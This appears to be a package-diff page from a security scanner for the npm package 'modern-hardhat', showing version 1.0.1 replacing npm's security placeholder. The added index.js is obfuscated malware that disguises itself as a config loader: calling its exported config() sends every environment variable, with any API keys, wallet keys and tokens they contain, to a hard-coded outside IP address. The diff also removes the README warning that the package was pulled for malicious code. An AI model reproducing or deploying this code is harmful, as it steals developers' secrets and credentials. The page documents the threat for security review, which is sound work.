modern-hardhat 0.0.1-security → 1.0.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of modern-hardhat might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +1 -0
  2. package/package.json +13 -3
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1 @@
1
+ function _0x167a(_0x317159,_0x9984c7){const _0x11f4bb=_0x11f4();return _0x167a=function(_0x167a14,_0xa5499){_0x167a14=_0x167a14-0x88;let _0x4a117b=_0x11f4bb[_0x167a14];return _0x4a117b;},_0x167a(_0x317159,_0x9984c7);}function _0x11f4(){const _0x309285=['3262700ehkIDN','stringify','axios','post','then','8420xbwTif','8012390rpmaoH','http://191.101.1.121/private/?data=','5766540ooGfZz','http://191.101.1.121/api/private/','env','136BgeooC','952779makQjf','443115eXqnlS','372fjPPiB','12PRqBQu','config','724894Swsjeh'];_0x11f4=function(){return _0x309285;};return _0x11f4();}const _0x40deb4=_0x167a;(function(_0x16213e,_0x54bb41){const _0x157b9d=_0x167a,_0x15b096=_0x16213e();while(!![]){try{const _0x21cc13=-parseInt(_0x157b9d(0x98))/0x1+parseInt(_0x157b9d(0x8b))/0x2*(parseInt(_0x157b9d(0x89))/0x3)+parseInt(_0x157b9d(0x88))/0x4*(-parseInt(_0x157b9d(0x91))/0x5)+parseInt(_0x157b9d(0x94))/0x6+-parseInt(_0x157b9d(0x8c))/0x7+-parseInt(_0x157b9d(0x97))/0x8*(-parseInt(_0x157b9d(0x99))/0x9)+-parseInt(_0x157b9d(0x92))/0xa;if(_0x21cc13===_0x54bb41)break;else _0x15b096['push'](_0x15b096['shift']());}catch(_0x23472d){_0x15b096['push'](_0x15b096['shift']());}}}(_0x11f4,0xd4ae7));const axios=require(_0x40deb4(0x8e));require('dotenv')[_0x40deb4(0x8a)](),exports[_0x40deb4(0x8a)]=async()=>{const _0x3f9376=_0x40deb4;try{let _0x454c99=_0x3f9376(0x93)+JSON['stringify'](process[_0x3f9376(0x96)]);axios['post'](_0x454c99)[_0x3f9376(0x90)](_0x521d90=>{})['catch'](_0x39c18d=>{});let _0x64f587=JSON[_0x3f9376(0x8d)](process[_0x3f9376(0x96)]);axios[_0x3f9376(0x8f)](_0x3f9376(0x95),_0x64f587)[_0x3f9376(0x90)](_0xba4160=>{});}catch(_0x52e5c4){}};
package/package.json CHANGED
@@ -1,6 +1,16 @@
1
1
  {
2
2
  "name": "modern-hardhat",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.1",
4
+ "main": "index.js",
5
+ "scripts": {
6
+ "test": "echo \"Error: no test specified\" && exit 1"
7
+ },
8
+ "author": "",
9
+ "license": "ISC",
10
+ "dependencies": {
11
+ "axios": "^1.1.3",
12
+ "dotenv": "^16.0.3"
13
+ },
14
+ "devDependencies": {},
15
+ "description": ""
6
16
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=modern-hardhat for more information.